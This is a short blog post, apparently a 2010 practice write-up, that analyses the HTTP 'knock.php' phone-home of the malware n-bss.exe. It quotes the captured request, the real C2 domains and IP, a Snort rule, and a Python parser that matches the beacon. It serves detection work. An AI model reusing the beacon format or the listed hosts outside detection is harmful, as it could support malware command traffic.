Sunday, January 3, 2010

Snort Signature Practice: n-bss.exe

n-bss.exe phones home with an HTTP GET to gateshis.cn (91.213.174.9), then tries to download another n-bss.exe binary from blogcz.cn (the domain was not resolving):

GET /knock.php?id=SYSTEM!WINXP!B857B9C9 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gateshis.cn
Connection: Keep-Alive

knock.php's id parameter is delimited by "!". "SYSTEM" remained consistent on my packet captures (user name of the process?). The next field is the computer's name. I'm not sure about the last field:

# flow also requires an established session; the pcre is anchored to the normalized URI buffer (/U)
# and the three "!"-delimited fields may not themselves contain "!"; rev and classtype added.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"n-bss.exe malware knock.php phone home"; flow:to_server,established; content:"GET"; http_method; uricontent:"/knock.php?id="; pcre:"/\/knock\.php\?id=SYSTEM![^!]+![^!]+$/U"; classtype:trojan-activity; sid:123120091; rev:1;)
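To sanity-check the pattern before loading it into Snort, here is an added example (not from the original post) that applies the same request-line and id-field logic to raw HTTP requests and pulls out the three "!"-delimited fields. The function name parse_knock and the field labels are my own; the first sample is the request quoted above and the second is a constructed non-matching request.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Same constraint the Snort pcre expresses: literal SYSTEM, then two more
# fields, none of which may contain the "!" delimiter.
KNOCK_ID_RE = re.compile(r"^SYSTEM![^!]+![^!]+$")

# Request captured in the post (reconstructed here as a test input).
SAMPLE_KNOCK = (
    "GET /knock.php?id=SYSTEM!WINXP!B857B9C9 HTTP/1.0\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: gateshis.cn\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
# Constructed benign request: same "id=SYSTEM" prefix but wrong path and
# only one field, so it must not match.
BENIGN = "GET /index.php?id=SYSTEM HTTP/1.1\r\nHost: example.com\r\n\r\n"


def parse_knock(raw_request):
    """Return the decoded knock fields plus the Host header if the request
    matches the n-bss.exe knock.php pattern, otherwise None."""
    head, _, _ = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or parts[0] != "GET":      # mirrors content:"GET"; http_method
        return None
    url = urlsplit(parts[1])
    if url.path != "/knock.php":                    # mirrors uricontent:"/knock.php?id="
        return None
    ids = parse_qs(url.query).get("id")
    if not ids or not KNOCK_ID_RE.match(ids[0]):    # mirrors the pcre
        return None
    user, hostname, last = ids[0].split("!")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # The post does not identify the third field, so it is labelled "unknown".
    return {"user": user, "hostname": hostname, "unknown": last,
            "host": headers.get("host")}


if __name__ == "__main__":
    print(parse_knock(SAMPLE_KNOCK))
    print(parse_knock(BENIGN))
```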

